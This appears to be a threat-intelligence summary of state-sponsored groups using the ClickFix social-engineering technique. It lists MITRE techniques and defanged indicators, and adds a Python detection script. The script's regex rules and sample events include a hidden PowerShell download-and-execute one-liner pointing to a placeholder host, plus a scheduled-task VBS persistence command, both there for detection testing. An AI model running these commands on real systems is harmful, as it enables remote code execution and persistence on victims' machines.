In recent months, state-sponsored actors from North Korea, Iran, and Russia have begun using the ClickFix social engineering technique, which until now had been associated mainly with financially motivated cybercriminals. The shift does not replace these groups' established espionage tradecraft; it augments existing infection chains with a method borrowed from the cybercrime ecosystem, and it is one more instance of cybercriminal techniques being adopted for state espionage. Affected: North Korea, Iran, Russia, Cybercrime, Espionage.
Keypoints :
- ClickFix is a social engineering technique first observed in early March 2024.
- State-sponsored actors from North Korea, Iran, and Russia began incorporating ClickFix in their tactics between late 2024 and early 2025.
- ClickFix replaces only the installation and execution stages of the groups' existing infection chains; the lure, targeting, and payloads stay the same.
- The technique presents an authoritative-looking pop-up alert (a fake error or verification prompt) that instructs the victim to copy a command and run it themselves, commonly via the Windows Run dialog, so the malicious command executes under the victim's own account.
- TA427 (North Korea), TA450 (Iran), and UNK_RemoteRogue and TA422 (Russia) are the notable groups observed using ClickFix.
- QuasarRAT, a publicly available remote access trojan, was the payload delivered at the end of TA427's ClickFix chain.
- Dynamic DNS services were used to host infrastructure supporting the ClickFix campaigns.
MITRE Techniques :
- T1566.002: Phishing: Spearphishing Link – TA427 engaged targets with a phishing email carrying a malicious link (T1193 is the retired ID for this technique).
- T1059.001: Command and Scripting Interpreter: PowerShell – the ClickFix lure has the victim run a malicious PowerShell command.
- T1053.005: Scheduled Task and T1059.005: Visual Basic – a scheduled task ran a VBS script every 19 minutes (previously tracked under the retired T1064 Scripting).
- T1204: User Execution – ClickFix exploits no software vulnerability; the victim is persuaded to paste and execute the command, so T1203 (Exploitation for Client Execution) does not describe it.
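The execution and persistence steps listed above (an interpreter launched from the user's own paste, a PowerShell download cradle, a scheduled task that runs a VBS file) give a detection engineer concrete features to alert on. The following Python is an added example, not code or detection logic from the Proofpoint post: the field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine), the rules, weights and threshold are assumptions to be tuned against a real baseline, the sample events are constructed, and update.example.invalid is a placeholder hostname. The RunMRU handling relies on the fact that Windows records Run-dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU with a trailing "\1" on each value.

```python
"""Heuristic ClickFix detection over process-creation events and RunMRU values.

Added example, not Proofpoint's code: field names follow Sysmon Event ID 1
(Image, ParentImage, CommandLine); rules, weights and sample data are assumptions.
"""
import re
from dataclasses import dataclass

# Interpreters a ClickFix lure typically tells the victim to launch.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}
# A parent of explorer.exe means the user launched it (Run dialog, shell), not another program.
USER_LAUNCH_PARENTS = {"explorer.exe"}

# (regex, weight, description) applied to the command line.
COMMAND_RULES = [
    (re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|iex|invoke-expression)\b", re.I),
     1, "PowerShell download/eval cradle"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
     1, "base64-encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
     1, "hidden window"),
    (re.compile(r"\bmshta(?:\.exe)?\s+https?://", re.I),
     2, "mshta fetching a remote HTA"),
    # Persistence seen in the TA427 chain: a scheduled task that runs a VBS file.
    (re.compile(r"\bschtasks(?:\.exe)?\s+/create\b.*\.vbs", re.I),
     2, "scheduled task running a VBS script"),
]
THRESHOLD = 2  # assumed value; tune against your own baseline


@dataclass
class ProcEvent:
    image: str          # Sysmon Image
    parent_image: str   # Sysmon ParentImage
    command_line: str   # Sysmon CommandLine


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_command_line(cmd: str):
    """Sum the weights of every rule the command line matches."""
    score, reasons = 0, []
    for pattern, weight, desc in COMMAND_RULES:
        if pattern.search(cmd):
            score += weight
            reasons.append(desc)
    return score, reasons


def score_event(ev: ProcEvent):
    """Command-line score plus one point if explorer.exe spawned an interpreter."""
    score, reasons = score_command_line(ev.command_line)
    if basename(ev.image) in INTERPRETERS and basename(ev.parent_image) in USER_LAUNCH_PARENTS:
        score += 1
        reasons.append("interpreter spawned by explorer.exe (user typed or pasted it)")
    return score, reasons


def score_runmru_value(value: str):
    """Score a RunMRU value; Windows stores Run-dialog history there with a trailing '\\1'."""
    cmd = value[:-2] if value.endswith("\\1") else value
    score, reasons = score_command_line(cmd)
    score += 1  # anything in RunMRU was typed or pasted into Win+R by the user
    reasons.append("found in RunMRU (Run dialog history)")
    return score, reasons


def detect(events, threshold=THRESHOLD):
    """Return [(index, score, reasons)] for events at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell -w hidden -c "iwr http://update.example.invalid/fix | iex"'),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'schtasks /create /sc minute /mo 19 /tn SystemUpdate /tr "wscript.exe C:\Users\Public\sys.vbs" /f'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", "powershell.exe"),  # user opened a shell: benign
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Editor\code.exe", "powershell -File build.ps1"),  # benign
]

if __name__ == "__main__":
    for index, score, reasons in detect(SAMPLE_EVENTS):
        print(f"event {index}: score {score}: {'; '.join(reasons)}")
```

The parent-process point deliberately counts for only one: a user opening PowerShell from the Start menu also produces explorer.exe as the parent, so that signal alone must not alert. Scored in combination with a download cradle or a hidden window it is the distinguishing feature of a pasted ClickFix command, and scoring RunMRU values the same way lets a responder recover the pasted command from the registry on a host where process telemetry was not collected.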
Indicators of Compromise :
- [Email Address] yasuyuki.ebata21@proton[.]me
- [Email Address] eunsoolim29@gmail[.]com
- [IP Address] 38.180.157[.]197
- [Domain] securedrive.fin-tech[.]com
- [URL] hxxps://securedrive.fin-tech[.]com/docs/en/register
Full Story: https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix